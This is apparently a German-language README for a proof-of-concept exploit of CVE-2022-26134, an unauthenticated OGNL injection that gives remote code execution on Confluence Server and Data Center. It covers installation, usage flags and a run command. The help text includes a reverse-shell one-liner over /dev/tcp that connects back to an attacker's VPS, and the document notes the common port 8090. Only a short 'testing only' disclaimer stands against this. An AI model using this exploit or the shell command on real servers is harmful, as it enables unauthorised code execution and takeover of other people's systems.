
Ein entfernter Angreifer kann ohne Authentifizierung OGNL-Ausdrücke konstruieren und injizieren, um auf Confluence Server oder Data Center beliebigen Code auszuführen. Basierend auf einem vorhandenen Skript wurde der Proof-of-Concept (PoC) modifiziert, um das Erlangen einer Shell zu erleichtern.
Ein entfernter Angreifer kann ohne Authentifizierung einen OGNL-Ausdruck injizieren, um beliebigen Code auf Confluence Server oder Data Center auszuführen. Der POC wurde modifiziert, um ein Get-Shell zu ermöglichen. Häufiger Port: 8090
pip3 install requests
______ _______ ____ ___ ____ ____ ____ __ _ _____ _ _
/ ___\ \ / | ____| |___ \ / _ |___ \|___ \ |___ \ / /_ / |___ /| || |
| | \ \ / /| _| _____ __) | | | |__) | __) _____ __) | '_ \| | |_ \| || |_
| |___ \ V / | |__|_____/ __/| |_| / __/ / __|_____/ __/| (_) | |___) |__ _|
\____| \_/ |_____| |_____|\___|_____|_____| |_____|\___/|_|____/ |_|
usage: CVE-2022-26134.py [-h] -t TARGET -c COMMAND
CVE-2022-26134
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Ziel-URL
-c COMMAND, --command COMMAND
Befehl ausführen (execute command), get shell: /bin/bash -c bash -i >& /dev/tcp/{vps ip}/{vps port} 0>&1
python3 CVE-2022-26134.py -t [Server-IP] -c [Befehl] // Befehl ausführen
Dieses Skript ist nur für Testzwecke vorgesehen und darf nicht für andere Zwecke verwendet werden.